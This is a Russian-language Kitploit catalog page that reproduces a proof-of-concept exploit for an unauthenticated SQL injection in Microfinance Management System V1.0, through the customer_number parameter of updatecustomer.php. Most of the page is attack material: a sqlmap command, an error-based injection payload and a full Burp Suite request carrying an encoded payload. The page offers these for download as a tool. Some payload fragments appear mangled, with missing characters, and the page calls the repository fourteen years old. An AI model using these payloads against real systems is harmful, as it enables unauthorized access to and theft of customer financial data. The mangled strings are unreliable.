Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated — Эксплойт-концепция для неаутентифицированной уязвимости SQL-инъекции в Microfinance Management System V1.0, позволяющая удаленное извлечение данных через параметр customer_number. | Kitploit
Инструменты/GitHubGitHub/erengozaydin/microfinance-management-system-v1.0-sql-injection-vulnerability-unauthenticated
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHuberengozaydin/microfinance-management-system-v1.0-sql-injection-vulnerability-unauthenticated

Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated

Эксплойт-концепция для неаутентифицированной уязвимости SQL-инъекции в Microfinance Management System V1.0, позволяющая удаленное извлечение данных через параметр customer_number.

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Microfinance Management System V1.0 SQL Injection Vulnerability (Unauthenticated)


  1. Описание:

Microfinance Management System позволяет выполнить SQL-инъекцию через параметр 'customer_number' в /mims/updatecustomer.php. Эксплуатация этой уязвимости может позволить злоумышленнику скомпрометировать приложение, получить доступ или изменить данные, или воспользоваться скрытыми уязвимостями в базе данных.


  1. Доказательство концепции:

В Burpsuite перехватите запрос с затронутой страницы с параметром 'customer_number' и сохраните его как poc.txt. Затем запустите SQLmap для извлечения данных из базы данных:

sqlmap.py -r poc.txt --dbms=mysql


  1. Пример полезной нагрузки:

(error-based)

customer_number=-5361' OR 1 GROUP BY CONCAT(0x716a786271,(SELECT (CASE WHEN (6766=6766) THEN 1 ELSE 0 END)),0x7171716a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'


  1. Запрос Burpsuite:

GET /mims/updatecustomer.php?customer_number=-1%27%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT()%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%27 HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,
/
;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=rf50l831r3vn4ho0g6aef189bt
Referer: http://localhost/mims/managecustomer.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

Скачать инструмент